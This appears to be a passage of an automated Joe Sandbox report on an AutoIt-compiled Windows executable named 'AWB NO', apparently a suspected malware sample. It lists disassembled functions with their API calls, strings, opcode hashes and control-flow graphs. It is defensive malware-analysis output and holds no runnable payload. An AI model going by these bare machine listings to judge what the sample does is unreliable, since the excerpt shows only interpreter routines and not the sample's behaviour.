                                                              • GetVersionExW.KERNEL32(?), ref: 00404B2B
                                                              • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404BF8
                                                              • IsWow64Process.KERNEL32(00000000), ref: 00404BFF
                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00404C45
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404C50
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404C81
                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404C8D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64
                                                              • String ID:
                                                              • API String ID: 2813406015-0
                                                              • Opcode ID: cd30fc2adabaadb48236dc33c1ba51adc404ead27c5a3d83d7604e8d22645665
                                                              • Instruction ID: a2a37668ba8dc9db7c0339275d8cd71390b5c234514a477f546c7b3e3bed8d02
                                                              • Opcode Fuzzy Hash: cd30fc2adabaadb48236dc33c1ba51adc404ead27c5a3d83d7604e8d22645665
                                                              • Instruction Fuzzy Hash: D591C17194A7C0DAC731CB6894511ABBFE4AF6A300F44496FD1CAA3B41D238F908D72E
                                                              Function 0040E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DtL$DtL$DtL$DtL$Variable must be of type 'Object'.
                                                              • API String ID: 0-814274700
                                                              • Opcode ID: dca0ef4c892b0d1592b2a78f9059ac52e4f12bb6aca03198f80d0126c7195138
                                                              • Instruction ID: 646285330f24ea673303868bc9691634490c9c151704f09186753778590e683b
                                                              • Opcode Fuzzy Hash: dca0ef4c892b0d1592b2a78f9059ac52e4f12bb6aca03198f80d0126c7195138
                                                              • Instruction Fuzzy Hash: 88A28C74A04205CFDB24CF59C480AAAB7B1FF48304F24847AE916BB391D739EC56CB99
                                                              Function 00464696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0043E7C1), ref: 004646A6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 004646B7
                                                              • FindClose.KERNEL32(00000000), ref: 004646C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                              • Instruction ID: d948841d4539c93f635718a430456d5b2beea82774a4ad5489b04229db4e1113
                                                              • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                              • Instruction Fuzzy Hash: 81E0D8318104005B46106738EC4D4EF7B5C9E86335F100B6BFC35C15E0F7B85964869F
                                                              Function 00410B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410BBB
                                                              • timeGetTime.WINMM ref: 00410E76
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410FB3
                                                              • TranslateMessage.USER32(?), ref: 00410FC7
                                                              • DispatchMessageW.USER32(?), ref: 00410FD5
                                                              • Sleep.KERNEL32(0000000A), ref: 00410FDF
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 0041105A
                                                              • DestroyWindow.USER32 ref: 00411066
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00411080
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 004452AD
                                                              • TranslateMessage.USER32(?), ref: 0044608A
                                                              • DispatchMessageW.USER32(?), ref: 00446098
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004460AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prL$prL$prL$prL
                                                              • API String ID: 4003667617-1216555602
                                                              • Opcode ID: b98837aeec403044573ac408058c8f54fb3af3f391c42ce489ab06450804f8b2
                                                              • Instruction ID: 5656ccdeff13743ef5fafe8623a2353e254cf1e2365aa485d3f3078d0d2561ca
                                                              • Opcode Fuzzy Hash: b98837aeec403044573ac408058c8f54fb3af3f391c42ce489ab06450804f8b2
                                                              • Instruction Fuzzy Hash: 6BB2A470608741DFEB24DF25C884BAAB7E5BF84304F14492FE44997392DB79E885CB4A
                                                              Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: b32fe6db03ccba481f670429e5c7b523f4edffb20c87d4c464e52b45bc5e04fc
                                                              • Instruction ID: 979edb967f183c55e8c669bfc31fc45122444ef7f147c2a4b30f384e98b85c10
                                                              • Opcode Fuzzy Hash: b32fe6db03ccba481f670429e5c7b523f4edffb20c87d4c464e52b45bc5e04fc
                                                              • Instruction Fuzzy Hash: 043149B1941304EFEB40DFA4D884ADDBBF4FB09310F14856EE941EA2A1D3B54545CFA9
                                                              Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: f316edc5448d5b1c0adbc22ddb0f2bed62490a930fea9617621b6011003a6786
                                                              • Instruction ID: 0e09ac2d9919322b342d86481b19008a338d121ad3b6117744e7067feae746c8
                                                              • Opcode Fuzzy Hash: f316edc5448d5b1c0adbc22ddb0f2bed62490a930fea9617621b6011003a6786
                                                              • Instruction Fuzzy Hash: 4021C9B1911218AFEB40EF94EC49B9DBBF4FB08710F10853AF511A62A0D7B545448FA9
                                                              Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 742 403633-403681 744 4036e1-4036e3 742->744 745 403683-403686 742->745 744->745 746 4036e5 744->746 747 4036e7 745->747 748 403688-40368f 745->748 749 4036ca-4036d2 DefWindowProcW 746->749 750 4036ed-4036f0 747->750 751 43d31c-43d34a call 4111d0 call 4111f3 747->751 752 403695-40369a 748->752 753 40375d-403765 PostQuitMessage 748->753 754 4036d8-4036de 749->754 756 4036f2-4036f3 750->756 757 403715-40373c SetTimer RegisterWindowMessageW 750->757 789 43d34f-43d356 751->789 758 4036a0-4036a2 752->758 759 43d38f-43d3a3 call 462a16 752->759 755 403711-403713 753->755 755->754 761 4036f9-40370c KillTimer call 4044cb call 403114 756->761 762 43d2bf-43d2c2 756->762 757->755 763 40373e-403749 CreatePopupMenu 757->763 764 403767-403776 call 404531 758->764 765 4036a8-4036ad 758->765 759->755 784 43d3a9 759->784 761->755 769 43d2c4-43d2c6 762->769 770 43d2f8-43d317 MoveWindow 762->770 763->755 764->755 772 4036b3-4036b8 765->772 773 43d374-43d37b 765->773 778 43d2e7-43d2f3 SetFocus 769->778 779 43d2c8-43d2cb 769->779 770->755 782 40374b-40375b call 4045df 772->782 783 4036be-4036c4 772->783 773->749 781 43d381-43d38a call 45817e 773->781 778->755 779->783 785 43d2d1-43d2e2 call 4111d0 779->785 781->749 782->755 783->749 783->789 784->749 785->755 789->749 790 43d35c-43d36f call 4044cb call 4043db 789->790 790->749
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                              • KillTimer.USER32(?,00000001), ref: 004036FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                              • CreatePopupMenu.USER32 ref: 0040373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0040375F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated$%I
                                                              • API String ID: 129472671-1195164674
                                                              • Opcode ID: ade9a57ce47ec72b798652a7ee168159b8380584aa4cd55c8456d76b2915c424
                                                              • Instruction ID: 10ee0b11622f1361c7ec63440bed57d6dff5d427fb300c744ab7812cb175661f
                                                              • Opcode Fuzzy Hash: ade9a57ce47ec72b798652a7ee168159b8380584aa4cd55c8456d76b2915c424
                                                              • Instruction Fuzzy Hash: 6A4117B11101057BDB646F68EC09F7A3A58E744302F10853FFA02A23E1CA7D9D45976E
                                                              Function 00403A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403A62
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403A71
                                                              • LoadIconW.USER32(00000063), ref: 00403A88
                                                              • LoadIconW.USER32(000000A4), ref: 00403A9A
                                                              • LoadIconW.USER32(000000A2), ref: 00403AAC
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AD2
                                                              • RegisterClassExW.USER32(?), ref: 00403B28
                                                                • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: 552b902710933b60bde5b1c9f8a90c0417f278bdc109eab354c750bae9b27ca4
                                                              • Instruction ID: 978f5407aac4946dfdf5ae0c6a166f51be6983a452a50cf8635c128c9a375653
                                                              • Opcode Fuzzy Hash: 552b902710933b60bde5b1c9f8a90c0417f278bdc109eab354c750bae9b27ca4
                                                              • Instruction Fuzzy Hash: 97213975900304AFEB50AFA4EC09F9D7FB4EB08711F01857AE504A62A0D3BA56548F98
                                                              Function 004310AB Relevance: 15.7, APIs: 10, Instructions: 665COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ec98489076b95a30573d543641477ff0bb110c22a6d79105289a783bc8a193e
                                                              • Instruction ID: fac9f2311dea19ca4eb9055d6c0ad94c291d6733af3d8b94b572845b1b924f8d
                                                              • Opcode Fuzzy Hash: 3ec98489076b95a30573d543641477ff0bb110c22a6d79105289a783bc8a193e
                                                              • Instruction Fuzzy Hash: DB325B70E002519FDB21CF68D881BAE7BB1AF5E304F28545FD8959B3A1C7388942CB69
                                                              Function 004071EB Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1019 4071eb-407310 call 431b90 call 4077c7 call 404864 call 42074f call 407e0b call 403f84 call 4077c7 call 407eec RegOpenKeyExW 1036 407316-407333 call 405a64 * 2 1019->1036 1037 43ecda-43ecf5 RegQueryValueExW 1019->1037 1039 43ecf7-43ed36 call 420ff6 call 40538e RegQueryValueExW 1037->1039 1040 43ed6c-43ed78 RegCloseKey 1037->1040 1053 43ed54-43ed5a 1039->1053 1054 43ed38-43ed52 call 407d2c 1039->1054 1040->1036 1042 43ed7e-43ed82 1040->1042 1045 43ed87-43edad call 407b52 * 2 1042->1045 1060 43edd2-43eddf call 422e3c 1045->1060 1061 43edaf-43edbd call 407b52 1045->1061 1057 43ed6a 1053->1057 1058 43ed5c-43ed69 call 42106c * 2 1053->1058 1054->1053 1057->1040 1058->1057 1070 43ede1-43edf2 call 422e3c 1060->1070 1071 43ee05-43ee3f call 407f41 call 403f84 call 405a64 call 407b52 1060->1071 1061->1060 1072 43edbf-43edd0 call 422fcd 1061->1072 1070->1071 1080 43edf4-43ee04 call 422fcd 1070->1080 1071->1036 1079 43ee45-43ee46 1071->1079 1072->1079 1079->1045 1080->1071
                                                              APIs
                                                                • Part of subcall function 00404864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C62F8,?,004037C0,?), ref: 00404882
                                                                • Part of subcall function 0042074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004072C5), ref: 00420771
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00407308
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043ECF1
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043ED32
                                                              • RegCloseKey.ADVAPI32(?), ref: 0043ED70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 338900592-2727554177
                                                              • Opcode ID: 607b47b27fcfcd6751cc0633fee537fff2dbfde3ec67acb6b88ee3d5b7331120
                                                              • Instruction ID: db50671f6cb5d1f91e5104dddd6ecfd126d9dd3bac4640c277fe0078958ce1d5
                                                              • Opcode Fuzzy Hash: 607b47b27fcfcd6751cc0633fee537fff2dbfde3ec67acb6b88ee3d5b7331120
                                                              • Instruction Fuzzy Hash: 1F7169715093019BC314EF26E88195BBBE8FF98344F40487FF445932A1EB74A948CF6A
                                                              Function 0043809E Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 627COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00438355
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 0043836F
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00438392
                                                              • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 004383A4
                                                              • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0043876A
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00438796
                                                                • Part of subcall function 00430D2D: FindCloseChangeNotification.KERNELBASE(00000000,0048FB24,00000000,?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D7D
                                                                • Part of subcall function 00430D2D: GetLastError.KERNEL32(?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$Close$Handle$ChangeFileFindNotificationType
                                                              • String ID: \O@
                                                              • API String ID: 688622981-2614762652
                                                              • Opcode ID: 0a6b6130e5bbbd62434dd304c50bb845989f1c5f28753ef287a13052889327a2
                                                              • Instruction ID: 3fee0311d1ca41f4d20e4be0e329f3a915b6e30b9270109f1ec2263e4bdf2ee0
                                                              • Opcode Fuzzy Hash: 0a6b6130e5bbbd62434dd304c50bb845989f1c5f28753ef287a13052889327a2
                                                              • Instruction Fuzzy Hash: 3622F0719003159BEF258F68DC42BAFBB60AB18324F24522EF920A73D1DB3D8D55CB59
                                                              Function 0040F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004203D3
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 004203DB
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004203E6
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004203F1
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 004203F9
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00420401
                                                                • Part of subcall function 00416259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040FA90), ref: 004162B4
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040FB2D
                                                              • OleInitialize.OLE32(00000000), ref: 0040FBAA
                                                              • CloseHandle.KERNEL32(00000000), ref: 004449F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: <gL$\dL$%I$cL
                                                              • API String ID: 1986988660-4247061687
                                                              • Opcode ID: a6d74c944e4d906a1d409453a8be92f40d1324297e09ebc2e5f727eca1a75f47
                                                              • Instruction ID: 1cfffd179986f18d43a6ac5aa0dacd7918427e6922d3cb84a31c4b765cbc4a66
                                                              • Opcode Fuzzy Hash: a6d74c944e4d906a1d409453a8be92f40d1324297e09ebc2e5f727eca1a75f47
                                                              • Instruction Fuzzy Hash: 5B8198B49012909EC7C8EF2AE954E557BE5EB88308312C93FD819C7272EB399409CF5D
                                                              Function 010325F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
